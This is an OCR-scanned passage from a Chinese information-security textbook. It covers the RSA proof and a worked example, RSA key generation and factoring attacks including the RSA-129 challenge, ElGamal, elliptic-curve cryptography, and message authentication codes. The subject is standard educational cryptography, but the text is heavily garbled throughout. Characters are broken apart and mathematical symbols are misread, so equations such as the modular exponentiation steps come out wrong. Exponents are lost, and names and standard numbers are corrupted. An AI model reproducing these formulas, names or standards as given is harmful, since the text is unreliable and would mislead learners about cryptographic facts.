又 因为 M<n, 所 以 M 不 可 能 既是 p 的 倍数 又 是 9 的 倍数 。 不 妨 设 M 是 p 的 倍数 ， 
M 一 cp,c 为 整数 。 
由 于 MM 不 是 g 的 倍数 ,所 以 gcd(M,q) 二 1, 则 M*? 志 1 mod q。 
所 以 :[M??]*? 圭 ] mod q, 即 Mr”"” 夺 1] mod g, 那 么 M”" 寺 1 mod g。 即 M*"==1 十 
bq,b 为 整数 。 
两 边 同 乘 以 M=cp; 则 :M*" 二 M 十 Mbpp。 
因为 M=cp, 所 以 
Me wt = M+cpbg = M 十 om 
因为 cb 为 整数 , 令 cb 二 K, 即 
Me 一 M 十 Km 
因为 ed 一 Ap(z) 十 1, 所 以 M“ 一 M 十 Kn, 即 
Me =Mmodn 
综 上 ,这 样 的 e,d,n 可 以 实现 加 密 C=M* mod n 和 解密 M 一 C? mod n。 
根据 上 述 原 理 ,RSA 算法 流程 可 描述 如 下 : 
(1) 选 两 个 保密 的 大 素数 p 和 g。 
(2) 计算 n=pXg,p(m) 二 (p 一 1)(g 一 1), 其 中 p(nw) 是 nn 的 欧 拉 函 数值 。 
(3) 选 一 整数 e, 满 足 1 二 ep(n) , 且 gcd(p(z) ,e) 一 1。 
(4) 计算 d, 满 足 4d，e 二 1 mod g(n), 即 4d 是 e 在 模 p(z) 下 的 乘法 逆 元 , 因 。 与 p(z) 互 
素 ,由 模 运算 可 知 , 它 的 乘法 逆 元 一 定 存在 。 
(5) 以 {e,n}) 为 公 钥 ,{d,n) 为 私 钥 。 
例题 : 选 p 二 7,g 二 17。 
求 n=pXg=119,9(m)=(p—1)(g—1)=96。 
解 : 取 e 二 5, 满 足 l<e<p(n), gcdCp(z) ,e) 一 1。 确定 满足 d*，e 二 1 mod 96 且 小 于 
96 的 d, 因 为 77X5==385 二 4X96 十 1, 所 以 4 为 77。 
因此 公 钥 为 {5,119}) , 私 钥 为 {77,119)。 设 明文 m 二 19, 则 由 加 密 过 程 得 密 文 为 
C= 19 mod 119 二 2476099 mod 119= 66 
解密 为 667"mod 119 王 19。 


442 RSA 算 法 在 计算 上 的 可 行 性 分 析 


在 4.3.3 节 中 我 们 阐述 了 公 钥 加 密 算 法 必须 满足 的 要 求 ,下 面 分 析 一 下 RSA 算法 是 否 
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能 够 达到 这 些 要 求 , 从 而 投入 实际 应 用 。 
1. 产生 密 钥 


RSA 算法 中 的 密 钥 包 括 公 钥 n,e 和 私 钥 d。 

1) 确定 7 

在 RSA 算法 中 ,n 是 由 两 个 素数 的 乘积 来 确定 的 。 由 于 是 公开 的 ,为 了 避免 攻击 者 
用 穷 举 法 求 出 p 和 g (根据 n= pg) ,应 该 从 足够 大 的 集合 中 选取 p 和 g, 即 p 和 g 必须 是 大 
素数 。 但 目前 还 没有 有 效 的 方法 可 以 产生 任意 大 素数 ,通常 使 用 的 方法 是 : 随机 挑选 一 个 
期 望 大 小 的 奇数 ,然后 测试 它 是 否 是 素数 , 若 不 是 , 则 挑选 下 一 个 随机 数 直 至 检测 到 素数 
为 止 。 

用 Miller-Rabin 素性 概率 检测 法 能 够 有 效 地 实现 素数 的 生成 。Miller 和 Rabin 提出 的 
素数 检测 算法 利用 了 费 尔 马 小 定理 , 即 如 果 n 是 素数 ,那么 a"! 三 1] (mod n)。 

Miller-Rabin 算法 可 以 确定 一 个 整数 是 合 数 ,但 不 能 确定 其 一 定 是 素数 。 不 过 尽管 如 
此 ,该 算法 所 产生 的 数 几 乎 可 以 肯定 是 素数 。 通 常 ,要 找到 一 个 2” 大 小 的 素数 ,在 找到 素 
数 之 前 大 约 要 进行 In(2”)/2 二 70 次 尝试 。 在 n 附近 平均 每 隔 lnn 个 整数 就 会 有 一 个 素 
数 。 因 此 ,找到 一 个 大 素数 ,在 计算 上 是 可 行 的 。 关 于 Miller-Rabin 算法 ,这 里 不 再 歼 述 。 

2) 确定 d 和。 

有 了 pp 和 gq, 可 计算 出 g(m)==(p 一 1)(g 一 1) ,根据 gcd(gy(n),e) 二 1 来 选择 e, 这 一 步 计 
算 量 也 不 大 ,因为 两 个 随机 数 互 素 的 概率 约 为 0.6。 

有 了 e, 再 计算 d=e mod gln) ,这 里 用 的 是 扩展 的 Euclid 算法 。 

总 之 ,产生 密 钥 是 容易 的 。 另 外 ,攻击 者 也 无 法 从 公 钥 & 和 nn 推导 出 私 钥 e 来 。 其 原因 
就 在 于 大 数 分 解 的 困难 性 ,在 下 一 小 节 会 有 所 阐述 。 


2. 加 密 解 密 


无 论 是 加 密 还 是 解密 都 需要 计算 某 个 整数 的 模 整数 次 串 ,C 一 M* mod n,M==C” mod 
n。 如 果 直 接 计 算 M“ 再 进行 模 )” 运 算 ,计算 量 就 很 大 。 但 实际 上 不 需要 先 求 出 整数 的 寡 再 
对 取 模 ,而 可 利用 模 运 算 的 性 质 : (a mod n)X(b mod nn) 二 (aX6b) mod ,对 于 Me mod 
nn, 可 先 求 出 M' mod n,M? mod n,M* mod n…, 再 求 M* mod n。 因 此 ,算法 的 加 密 和 解密 运 
算 在 计算 上 都 是 可 行 的 。 

另外 ,根据 公 钥 加 密 体 制 的 要 求 ,RSA 算法 的 加 密 解 密 运算 是 可 逆 的 , 即 LCOM ) mod 站 
mod 2 一 M, 同 时 ,[CMz) mod nl mod n=M., 
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攻击 公 钥 密码 系统 的 方法 有 如 下 几 种 : 

(1) 穷 举 法 : 对 此 防范 措施 应 为 使 用 长 的 密 钥 。 例 如 RSA 目前 建议 的 密 钥 长 度 为 
2048 位 。 但 是 由 于 公 钥 算法 依赖 于 单 向 陷 门 函数 ,计算 函数 的 复杂 性 与 密 钥 的 长 度 的 关系 可 
能 会 增长 得 更 快 。 因 而 密 钥 大 小 必须 足够 大 ,以 保证 安全 性 ,但 是 又 要 足够 小 以 增强 实用 性 。 

(2) 利用 数学 分 析 来 破解 。RSA 的 安全 性 基于 大 数 分 解 质 因子 的 困难 性 。 小 合 数 的 


信息 安全 原理 及 应 


因子 分 解 是 容易 的 ,然而 大 合 数 的 因子 分 解 却 是 十 分 困难 的 。 只 要 合 数 足够 大 ,分 解 因子 是 
足够 困难 的 。 

密码 分 析 者 攻击 RSA 密码 的 一 种 可 能 途径 是 截获 密 文 C, 从 中 求 出 明文 M。 他 们 知道 
M=C? mod n, 因 为 e 是 公开 的 ,要 从 C 中 求 出 明文 M ,必须 先 求 出 ,而 d 是 保密 的 。 但 他 
们 知道 ,4 一 e-: mod g(n),e 是 公开 的 ,要 从 中 求 出 4 ,必须 先 求 出 p(n) ,而 g(n) 是 保密 的 。 
但 他 们 又 知道 g(x) 二 (p 一 1)(g 一 1) ,要 从 中 求 出 p(x) , 则 必须 先 求 出 p 和 g ,而 p 和 g 是 保 
密 的 。 要 求 出 p 和 g ,只 能 对 进行 因子 分 解 。 当 足够 大 时 ,这 是 非常 困难 的 。 

因此 ,只 要 能 对 进行 因子 分 解 , 便 可 攻破 RSA 密码 。 由 此 可 以 得 出 ,破译 RSA 密码 
的 困难 性 大 于 等 于 对 n 进行 因子 分 解 的 困难 性 。 目 前 尚 不 能 证 明 两 者 是 否 确切 相等 ,因为 
不 能 确定 除了 对 n 进行 因子 分 解 的 方法 外 ,是 否 还 有 别 的 更 加 简捷 的 破解 方法 。 

1977 年 ,Mirtin Gardner 在 Scientific American 的 专栏 文章 中 介绍 了 RSA 算法 。 为 了 
显示 这 一 技术 的 威力 ,RSA 公司 的 研究 人 员 用 一 个 129 位 的 数 N 和 一 个 4 位 数 e 对 一 个 关 
于 秃 鹰 的 消息 做 了 编码 。Gardner 刊登 了 这 个 密 文 

96869 61375 46220 61477 14092 22543 55882 90575 99911 24574 31987 46951 20930 
81629 82251 45708 35693 14766 22883 98962 80133 91990 55182 99451 57815 154 

同时 给 出 了 NN 和 e。RSA 公司 还 悬赏 100 美元 , 奖 给 第 一 个 破译 这 密码 的 人 。 他 们 其 
至 预言 破解 这 个 难题 至 少 需 要 4X10” 年 。 

17 年 后 ,一 批 松散 组 成 的 因子 分 解 迷 , 大 约 有 600 多 人 ,分 布 在 20 多 个 国家 。 他 们 经 
过 8 个 月 的 努力 最 后 于 1994 年 4 月 为 RSA-129 找到 了 64 位 数 和 65 位 数 两 个 素数 因子 

11438 16257 57888 86766 92357 79976 14661 20102 18296 72124 23625 62561 84293 
57069 35245 73389 78305 97123 56395 87050 58989 07514 75992 90026 87954 3541 

一 34905 29510 84765 09491 47849 61990 38981 33417 76463 84933 87843 99082 0577 

X32769 13299 32667 09549 96198 81908 34461 41317 76429 67992 94253 97982 88533 
破译 出 的 明文 是 The magic words are squeamish ossifrage。 

因此 ,应 用 RSA 密码 应 密切 关注 世界 因子 分 解 的 进展 。 虽 然 大 合 数 的 因子 分 解 十 分 困 
难 , 但 随 着 科学 技术 的 发 展 ,人 们 对 大 合 数 因子 分 解 的 能 力 在 不 断 提高 ,而 且 分 解 所 需 的 成 
本 在 不 断 下 降 。 继 1994 年 4 月 RSA-129 被 破译 ,1996 年 4 月 RSA-130 也 被 破译 。1999 年 
2 月 由 美国 荷兰、 英国、 法 国 和 澳大利亚 的 数学 家 和 计算 机 专家 ,通过 Internet 网 ,历时 1 个 
月 ,成 功 的 分 解 了 140 位 的 大 合 数 ,破译 了 RSA-140。 同 年 RSA-155 被 破解 。2002 年 ， 
RSA-158 也 被 成 功 因 数 分 解 。2005 年 ,RSA-200 被 破解 。 

大 合 数 因子 分 解 算法 的 研究 是 当前 数论 和 密码 学 一 个 十 分 活跃 的 领域 。 目 前 大 合 数 因 
子 分 解 的 主要 算法 有 Pomerance 的 二 次 得 法 .Lenstra 的 椭圆 曲线 分 解 算 法 和 Pollard 的 数 
域 筛 法 及 广义 数 域 得 法 进行 因子 分 解 所 需 的 计算 机 资源 。 

因此 我 们 今天 要 使 用 RSA 密码 ,首先 应 当 采 用 足够 大 的 整数 n。 普 遍 认为 ,n 至 少 应 该 
1024 位 ,最 好 是 2048 位 。 估 计 在 未 来 一 段 比较 长 的 时 期 , 密 钥 长 度 介 于 1024 比特 至 2048 
比特 之 间 的 RSA 是 安全 的 。 

另外 ,为 了 防止 可 以 很 容易 地 分 解 ,RSA 算法 的 发 明 者 建议 p 和 g 还 应 满足 下 列 限制 
条 件 : 

(1) p 和 4g 的 长 度 应 仅 相差 几 位 。 对 于 1024 位 的 密 钥 而 言 ,p 和 g 都 应 在 105 一 101% 


之 间 。 
(2) (p 一 1) 和 (g 一 1) 都 应 有 一 个 大 的 素 因 子 。 
(3) gcd(p 一 1,g 一 1) 应 该 较 小 。 


45 其 他 公 钥 密码 算法 


45.1 日 Gamal 密码 


ElGamal 密码 是 除了 RSA 密码 之 外 最 具有 代表 性 的 公 钥 密码 ,RSA 密码 建立 在 大 整 
数 因子 分 解 的 困难 性 之 上 ,而 ElIGamal 密码 建立 在 离散 对 数 的 困难 性 之 上 。 大 整数 因子 分 
解 和 离散 对 数 问题 是 目前 公认 的 较 好 的 单 向 函数 ,因而 RSA 密码 和 ElGamal 密码 是 目前 
公认 的 安全 的 公 钥 密码 。 

ElGamal 密码 是 由 ElGamal 于 1985 年 提出 。 该 密码 系统 可 应 用 于 加 /解密 、 数 字 签 名 
等 ,其 安全 性 是 建立 于 离散 对 数 (discrete logarithm) 问 题 之 上 的 , 即 给 定 g,p 与 y= 二 g* mod 
Pp, 求 x 在 计算 上 不 可 行 。 下 面 简单 介绍 ElIGamal 密码 的 密 钥 产 生 、 加 /解密 程序 、 数 字符 名 
与 验证 等 算法 。 关 于 数字 签名 将 在 后 续 章 节 中 详细 介绍 。 


1. 密 钥 产 生 


(1) 任 选 一 个 大 素数 p ,使 得 p 一 1 有 大 素 因子 。 

(2) 任 选 一 个 mod 户 的 本 原 根 g 。 

(3) 公布 p 与 g。 

使 用 者 任 选 一 私 钥 zxE Z, ,并 计算 公 钥 y 一 g” mod p。 
2. 加密 程序 (m 为 明文 ) 


(1) 任 选 一 个 随机 数 rE 2Z 满足 gcd(r,p 一 1) 二 1, 并 计算 
a=g modp 
cz 一 MX modp 

(2) 密 文 为 {ci ,cs}。 


3. 解密 程序 


(1) 计算 w= (cf)7! mod p。 

(2) 计算 明文 m= 二 cs Xw mod p。 

4. 签名 程序 ( 欲 签名 的 信息 为 m) 

(1) 任 选 一 个 随机 数 AE Zi 满足 gcd(k,p 一 1) 一 1, 并 计算 
r=g:modp 


5 一 人 (zz 一 ZXr) mod (p—1) 
(2) 签名 为 {r,s} 。 
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5. 验证 签名 程序 


验证 签名 : y”Xr’ 二 g”(mod p)。 

为 了 避免 选择 密 文 攻击 ,ElGamal 方法 于 签名 信息 时 用 消息 的 哈 希 值 h(m) (在 后 续 章 
节 中 介绍 ) 取 代 m。 与 RSA 方法 比较 ,ElGamal 方法 具有 以 下 优点 : 

(1) 系统 不 需要 保存 秘密 参数 ,所 有 的 系统 参数 均 可 公开 。 

(2) 同一 个 明文 在 不 同 的 时 间 由 相同 加 密 者 加 密会 产生 不 同 的 密 文 ,但 EIGamal 方法 
的 计算 复杂 度 比 RSA 方法 要 大 。 


452 椭圆 曲线 密码 体制 


绝 大 部 分 使 用 公 钥 系统 都 使 用 RSA 算法 ,但 是 , 随 着 安全 使 用 RSA 算法 所 要 求 的 比特 
长 度 的 增加 ,使 用 RSA 算法 的 信息 处 理 负担 越 来 越 大 ,这 个 负荷 对 于 那些 进行 大 量 的 安全 
交易 的 电子 商务 站 点 尤其 明显 。 自 20 世纪 80 年 代 中 期 ,椭圆 曲线 理论 被 引入 数据 加 密 领 
域 ,逐步 形成 一 个 挑战 RSA 系统 的 公 钥 系统 -椭圆 曲线 密码 编码 学 (Elliptic Curve 
Cryptography, ECC) 。 

椭圆 曲线 密码 是 基于 椭圆 申 线 数学 的 一 种 公 钥 密 码 的 方法 。 椭 圆 曲 线 在 密码 学 中 的 使 
用 是 在 1985 年 由 Neal Koblitz 和 Victor Miller 分 别 独 立 提出 的 。 其 依据 就 是 定义 在 椭圆 
曲线 点 群 上 的 离散 对 数 问题 的 难 解 性 。 椭 圆 曲 线 在 代数 学 和 几何 学 上 已 经 广泛 研究 了 150 
多 年 之 久 , 有 丰富 而 深厚 的 理论 积累 。 

ElGamal 密码 是 建立 在 有 限 域 GF(p) 之 上 的 ,其 中 p 是 一 个 大 素数 ,这 是 因为 有 限 域 
GF(p) 的 乘法 群 中 的 离散 对 数 问题 是 难 解 的 。 受 此 启发 ,在 其 他 任何 离散 对 数 问 题 难 解 的 
群 中 ,同样 可 以 构成 ElGamal 密码 。 于 是 人 们 开始 寻找 其 他 离散 对 数 问题 难 解 的 群 。 研 究 
发 现 , 有 限 域 GF(p) 上 的 椭圆 曲线 上 的 一 些 点 构成 交换 群 ,而 且 离 散 对 数 问题 难 解 。 于 是 
可 以 在 此 群 上 定义 ElGamal 密码 ,并 称 之 为 椭圆 曲线 密码 。 

ECC 的 主要 优点 是 它 可 以 用 少 得 多 的 比特 大 小 取得 和 RSA 相等 的 安全 性 ,因此 减 小 
了 处 理 开销 。 另 外 ,经 RSA 实验 室 验证 ,从 目前 已 知 的 最 好 求解 算法 来 看 ,160 比特 的 椭圆 
曲线 密码 算法 的 安全 性 相当 于 1024 比特 的 RSA 算法 ,并 且 ECC-160 加 /解密 的 速度 比 
RSA-1024 快 约 5 一 8 倍 。 

椭圆 曲线 密码 的 另 一 个 优势 是 可 以 定义 群 之 间 的 双 线 性 映射 ,基于 Weil 对 或 是 Tate 
对 ; 双 线性 映射 已 经 在 密码 学 中 发 现 了 大 量 的 应 用 ,例如 基于 身份 的 加 密 。 

正 因 如 此 ,一 些 国际 化 标准 组 织 已 把 椭圆 曲线 密码 作为 新 的 信息 安全 标准 。 如 IEEE 
P1364/D4、ANSI F9. 62、ANSI F9. 63 等 标准 ,分 别 规范 了 椭圆 曲线 密码 在 Internet 协议 安 
全 、 电 子 商 务 `.Web 服务 器 、 空 间 通 信 移动 通信 、 智 能 卡 等 方面 的 应 用 。 


消息 认证 


回顾 第 1 章 所 提 到 的 信息 安全 的 目标 ,包括 机 密 性 ,完整 性 、 可 用 性 和 抗 否 认 性 。 其 中 ， 
机 密 性 可 以 通过 加 密 来 保证 ,可 用 性 通过 提高 系统 性 能 和 各 种 安全 技术 及 应 用 来 保证 。 而 
完整 性 和 不 可 否认 性 则 要 靠 消 息 认证 和 数字 签名 来 完 


5.1 消息 认证 基本 概念 


认证 (authentication) , 即 鉴 别 . 确 认 , 它 是 证 实 某 事 是 否 名 副 其 实 或 是 否 有 效 的 一 个 
过 程 。 

认证 与 加 密 的 区 别 在 于 两 者 有 不 同 的 目标 。 加 密 用 以 确保 数据 的 机 密 性 ,阻止 对 手 的 
被 动 攻击 ,如 截取 ,窃听 ,这 种 被 动 攻击 只 是 获取 和 破译 数据 ,并 不 对 传输 中 的 数据 进行 贷 
改 。 而 认证 用 以 确保 报 文 发 送 者 和 接收 者 的 真实 性 以 及 完整 性 ,阻止 对 手 的 主动 攻击 ,如 冒 
充 、 算 改 , 重 播 等 。 认 证 往往 是 应 用 系统 中 安全 保护 的 第 一 道 防线 ,极为 重要 。 

认证 的 基本 思想 是 通过 验证 称谓 者 (人 或 事 ) 的 一 个 或 多 个 参数 的 真实 性 和 有 效 性 ,来 
达到 验证 称谓 者 是 否 名 副 其 实 的 目的 。 常 用 的 参数 有 口令 .标识 符 、 密 钥 、 信 物 、 智 能 卡 、 指 
纹 、 视 网 纹 等 。 其 中 ,利用 人 的 生理 特征 参数 进行 认证 的 安全 性 高 ,但 技术 要 求 也 高 ,至 今 尚 
未 普及 ,所 以 目前 广泛 应 用 的 还 是 基于 密码 的 认证 技术 。 

消息 认证 (message authentication) 是 一 个 证 实 收 到 的 消息 来 自 可 信和 的 源 点 且 未 被 算 改 
的 过 程 。 有 时 也 被 称 为 “消息 鉴别 ”。 

一 个 没有 消息 认证 的 通信 系统 是 极为 危险 的 ,如 图 5-1 所 示 。 
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用 户 A 用 户 B 


自 改 、 伪造 、 重 放 、 上 冒充 


恶意 者 C 
图 5-1 通信 系统 受到 主动 攻击 
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当 合法 用 户 A 和 B 在 传递 消息 M 时 ,通信 和 链 路 的 另外 一 端的 恶意 者 C, 可 以 对 消息 M 
进行 自 改 后 再 发 送 给 B, 也 可 能 伪造 一 条 消息 发 送 给 B, 或 者 是 把 消息 M 保存 下 来 ,在 某 个 
特定 的 时 间 再 发 送 给 用 户 B, 这 种 攻击 形式 称 为 消息 的 延迟 ; 在 以 后 的 时 段 中 多 次 将 消息 
M 发 送 给 B, 这 种 攻击 形式 称 为 消息 的 重 放 。 

所 以 认证 的 目的 是 验证 信息 的 完整 性 ,在 传送 或 存储 过 程 中 未 被 算 改 ,冒充 、 重 放 或 延 

认证 符 是 一 个 用 来 认证 消息 的 值 。 由 消息 的 发 送 方 产生 认证 符 , 并 传递 给 接收 方 。 接 
收 方 则 根据 这 个 认证 符 来 对 收 到 的 消息 以 及 来 源 方 的 身份 进行 鉴别 。 

通常 ,认证 系统 由 两 部 分 组 成 ,分 别 是 认证 编码 器 和 认证 译 码 器 ,可 抽象 为 认证 函数 。 
认证 函数 也 就 是 产生 认证 符 的 函数 。 认 证 函数 实际 上 代表 了 一 种 产生 认证 符 的 方法 。 作 为 
一 个 安全 的 认证 系统 , 需 满足 意 定 的 接收 者 能 够 检验 和 证 实 消息 的 合法 性 、 真 实 性 和 完整 
性 ,另外 除了 合法 的 消息 发 送 者 ,其 他 人 不 能 伪造 合法 的 消息 。 

对 于 一 个 消息 认证 系统 而 言 , 其 关键 在 于 如 何 根据 需要 传输 的 消息 来 产生 能 够 对 该 消 
息 进行 鉴别 的 认证 符 , 即 认证 函数 如 何 选择 。 通 常 , 认 证 函数 可 分 为 如 下 三 类 : 

(1) 消息 加 密 函 数 (message encryption): 用 完整 信息 的 密 文 作为 对 信息 鉴别 的 认 

(2) 消息 认证 码 MAC(message authentication code): 消息 认证 码 是 消息 和 密 钥 的 公 
开 函 数 , 它 产生 定 长 的 值 ,以 该 值 作为 认证 符 。 

(3) 散 列 函 数 (hash function) : 是 一 个 公开 的 函数 , 它 将 任意 长 的 信息 映射 成 一 个 固定 
长 度 的 信息 。 

本 章 对 这 三 类 认证 方法 进行 详细 站 述 。 


52 消息 加 密 认 证 


对 消息 的 自身 加 密 所 得 到 的 密 文 ,可 以 作为 一 个 认证 的 度量 。 其 中 ,对 称 加 密 模式 和 公 
钥 加 密 模式 有 所 不 同 。 
1. 对 称 密码 体制 下 的 加 密 认 证 


在 对 称 密码 体制 下 ,发 送 者 A 和 接收 者 B 双方 共同 拥有 密 钥 ,A 把 加 密 过 的 信息 传送 


给 B, 如 图 5-2 所 示 。 
M < - < 加 


A 无 Ex(M) K B 
5-2 对称 密码 体制 下 的 加 密 认 证 


由 于 攻击 者 不 知道 密 钥 KK, 他 也 就 不 知道 如 何 改 变 密 文 中 的 信息 位 才能 在 明文 中 产生 
预期 的 改变 。 
接收 方 B 只 要 能 顺利 解 出 明文 ,就 知道 信息 在 中 途 没有 被 人 更 改过 。 他 根据 解密 后 的 
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明文 是 否 具 有 合理 的 语法 结构 来 进行 消息 认证 。 

但 在 这 个 方法 中 存在 的 问题 是 ,如 果 发 送 的 消息 M 本 身 并 没有 明显 的 语法 结构 或 特 
征 , 例 如 二 进 制 文件 ,那么 接收 方 很 难 确定 解密 后 的 消息 就 是 明文 本 身 。 

为 了 解决 这 个 问题 ,要 求 明文 具有 某 种 易于 识别 的 结构 ,并 且 不 通过 加 密 函 数 是 无 法 重 
复 这 个 结构 的 。 

例如 在 加 密 前 对 消息 附加 一 个 错误 检测 码 , 根 据 明 文 消息 M 和 公开 的 函数 下 产生 
FCS, 即 错误 检测 码 ,或 称 帧 校 验 序列 、 校 验 和 。 然 后 把 M 和 FCS 合 在 一 起 加 密 , 并 传输 。 
接收 端 收 到 密 文 后 把 密 文 解密 ,得 到 M。 最 后 进行 认证 ,接收 者 根据 得 到 的 M, 按 照 下 计算 
FCS, 并 与 接收 到 的 FCS 比较 是 否 相 等 ,如 图 5-3 所 示 。 


M 


天 天 
ExMIFCMO] 
图 5-3 ”内 部 错误 控制 


如 果 攻 击 者 修改 了 密 文 , 则 接收 者 计算 出 来 的 FCS 与 其 收 到 的 FCS 将 无 法 匹配 。 
这 里 ,加 密 函 数 和 下 函数 的 执行 顺序 是 非常 重要 的 。 与 图 5-3 相对 应 的 还 有 外 部 错误 
控制 , 即 先 加 密 , 再 计算 FCS, 如 图 5-4 所 示 。 


天 


EM) 


FlEKM)) 
图 5-4 外 部 错误 控制 


在 外 部 错误 控制 中 ,由 于 函数 下 是 公开 的 ,攻击 者 可 以 构造 具有 正确 错误 控制 码 的 消 
息 , 虽 然 攻 击 者 不 知道 解密 后 的 明文 ,但 可 以 造成 混淆 并 破坏 通信 。 


2. 公 钥 密码 体制 下 的 加 密 认证 


4.3.2 节 介 绍 了 公 钥 密码 体制 下 的 三 种 应 用 , 即 保 证 机 密 性 ,保证 真实 性 和 既 保证 机 密 
性 又 保证 真实 性 。 

(1) 在 保证 机 密 性 (如 图 4-2 所 示 ) 的 应 用 方式 中 ,发 送 端 A 用 B 的 公 钥 对 消息 加 密 , 然 
后 传输 给 接收 端 B。B 用 自己 的 私 钥 解密 。 显 然 这 种 方式 只 能 对 数据 加 密 ,而 不 能 用 于 认 
证 ,因为 B 的 公 钥 是 公开 的 ,任何 人 都 可 以 向 B 发送 消息 ,所 以 B 无 从 确认 消息 的 来 源 和 内 
容 的 真实 性 。 

(2) 保证 真实 性 (如 图 4-3 所 示 ) 的 应 用 方式 则 可 以 用 于 消息 认证 。 因 为 在 发 送 消息 时 
用 发 送 者 的 私 钥 进 行 了 加 密 。 这 就 使 得 如 果 接 收 方 能 够 用 发 送 方 的 公 钥 解密 , 则 说 明 该 消 
息 的 确 是 由 发 送 方 发 送 的 , 且 消 息 内 容 没 有 被 自 改 。 当 然 ,这 种 方式 不 保证 机 密 性 。 因 为 任 
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何人 都 可 以 拥有 发 送 方 的 公 钥 。 

(3) 既 保证 机 密 性 又 保证 真实 性 (如 图 4-4 所 示 ), 则 既 保证 了 消息 的 机 密 性 ,也 可 以 进 
行 消息 的 认证 。 但 一 次 通信 中 要 执行 四 次 复杂 的 公 钥 算法 ,其 计算 代价 是 非常 高 的 。 

所 以 ,第 二 ,三 两 种 方法 一 般 在 认证 时 极 少 应 用 ,因为 前 面 讲 过 , 公 钥 密码 体制 加 密 的 速 
度 非常 慢 , 当 信息 内 容 很 多 的 时 候 ,这 样 的 加 密 更 加 困难 ,要 耗费 大 量 的 时 间 和 资源 ,所 以 一 
般 人 们 是 利用 公 钥 对 信息 的 Hash 码 进 行 加 密 , 具 体内 容 在 介绍 数字 签名 时 会 提 到 。 


53 消息 认证 码 
531 消息 认证 码 的 基本 用 法 


消息 认证 码 , 也 是 一 种 认证 技术 。 它 把 一 个 密 钥 和 需要 认证 的 消息 一 起 代入 一 个 函数 ， 
计算 出 一 个 固定 长 度 的 短 数据 块 , 称 为 MAC (Message Authentication Code) ,或 密码 校 验 


和 (Cryptographic Checksum), 并 把 MAC 附加 在 消 

息 后 ,一 起 发 送 给 接收 方 ,如 图 5-5 所 示 。 消息 M 消息 M 
MAC=CCM,K), 这 里 M 是 需 认 证 的 消息 ; C 是 CMK) MACS 

MAC 函数 ; K 是 通信 双方 共享 的 密 钥 ; MAC 是 消息 

认证 码 。 图 5-5 MAC 的 生成 


接收 方 收 到 消息 后 ,只 需要 根据 密 钥 、 收 到 的 消息 以 及 MAC 函数 来 重新 计算 MAC ,并 
检查 是 否 等 于 传 过 来 的 MAC。 如 果 两 者 相等 ,接收 者 可 以 确信 消息 M 未 被 自 改 ,因为 如 果 
攻击 者 改变 了 消息 ,由 于 不 知道 ,无 法 生成 正确 的 MAC; 另外 ,接收 者 也 可 以 确信 消息 来 
自 所 声称 的 发 送 者 ,因为 其 他 人 不 能 生成 和 原始 消息 相对 应 的 MAC。 认 证 的 过 程 如 图 5-6 
所 示 。 


M a MAC 
1 
(c) 


天 
图 5-6 消息 认证 码 的 基本 用 法 


MAC 函数 与 加 密 函 数 类 似 , 都 需要 明文 、 密 钥 和 算法 的 参与 。 但 MAC 算法 不 要 求 可 
逆 性 ,而 加 密 算 法 必须 是 可 逆 的 。 

例如 ,使 用 100 比特 的 消息 和 10 比特 的 MAC ,那么 总 共有 22m 个 不 同 的 消息 ,但 仅 有 
2" 个 不 同 的 MAC。 也 就 是 说 ,平均 每 2” 个 消息 使 用 的 MAC 是 相同 的 。 

因此 ,认证 函数 比 加 密 函 数 更 不 易 被 攻破 ,因为 即便 攻破 也 无 法 验证 其 正确 性 。 关 键 就 
在 于 加 密 函 数 的 明文 和 密 文 是 一 对 一 的 ,而 认证 函数 的 消息 和 MAC 则 是 多 对 一 的 。 

另外 ,消息 本 身 并 没有 经 过 加 密 只 提供 认证 ,不 提供 机 密 性 。 如 果 需 要 机 密 性 ,可 以 利 
用 对 称 加 密 体制 或 者 公 钥 密码 加 密 体制 对 消息 进行 加 密 。 
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例如 在 图 5-7 中 , 先 根据 明文 消息 、 密 钥 K， 和 MAC 函数 C 计算 出 消息 的 MAC, 然 后 
把 MAC 和 消息 M 连接 在 一 起 ,再 用 密 钥 K。 和 加 密 算法 E 进行 加 密 , 然 后 发 送 到 接收 方 。 
接收 方 先 用 密 钥 ,和 解密 算法 D 对 密 文 进行 解密 ,得 到 消息 M 和 MAC, 最 后 根据 收 到 的 
M. 密 钥 K 和 MAC 函数 C 计算 出 MAC, 和 收 到 的 MAC 进行 比较 ,从 而 对 消息 进行 认证 。 


TQ 上 yl 了 加 人 


ELMICKCO] 


图 5-7 与 明文 有 关 的 认证 


图 5-7 中 的 消息 认证 方式 称 为 与 明文 有 关 的 认证 , 即 先 计算 MAC, 再 对 M 和 MAC 一 
起 加 密 , 加 密 的 对 象 是 明文 。 其 中 ,通信 双方 共享 K! 和 K,,K, 用 于 生成 MAC, Ks 用 于 
加 密 。 

如 果 先 对 明文 M 加 密 , 然 后 对 得 到 的 密 文 计算 MAC, 即 对 密 文 计算 MAC, 则 称 为 与 密 
文 有 关 的 认证 ,如 图 5-8 所 示 。 


CrmlExr MD)] 


图 5-8 与 密 文 有 关 的 认证 


那么 为 什么 要 专门 找 MAC 函数 来 提供 认证 ,而 不 直接 使 用 前 面 所 说 的 加 密 方法 来 提 
供认 证 呢 , 主 要 有 以 下 几 个 原因 : 

(1) 信息 加 密 提供 的 是 机 密 性 而 非 真实 性 。 

(2) 加 密 计算 的 代价 大 ,特别 是 当 信息 内 容 比 较 长 的 时 间 , 加 密 所 占用 的 资源 太 多 ,如 
果 是 公 钥 密码 体制 , 则 代价 更 大 。 

(3) 认证 函数 与 加 密 函 数 的 分 离 能 提供 功能 上 的 灵活 性 ,因为 有 些 情况 下 ,只 需要 提供 
机 密 性 ,而 不 需要 提供 真实 性 ,而 另 一 些 情况 下 , 某 些 信息 只 需要 真实 性 ,不 需要 机 密 性 。 例 
如 广播 ,由 于 其 信息 量 大 ,难以 使 用 加 密 的 手段 ,又 例如 政府 或 者 权威 部 门 的 公告 ,只 需要 保 
证 真实 性 ,而 不 需要 机 密 性 。 


532 消息 认证 码 的 安全 性 


对 消息 认证 码 进行 攻击 主要 有 两 种 方法 。 其 一 是 攻击 密 钥 , 试 图 找到 计算 MAC 的 密 
钥 ; 其 二 是 攻击 MAC 函数 的 算法 ,找到 其 弱点 。 
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1. 攻击 密 钥 


已 知 消息 M 和 MAC 算法 C, 以 及 MAC 一 Cs (Ml), 现 要 用 穷 举 法 破解 后。 密 钥 长 
度 为 个 bit,MAC 的 长 度 为 nn 个 bit。 

当 k>n 时 ,可 能 的 密 钥 个 数 为 2*, 可 能 的 MAC 个 数 为 2" 个。 所 以 许多 不 同 的 密 钥 
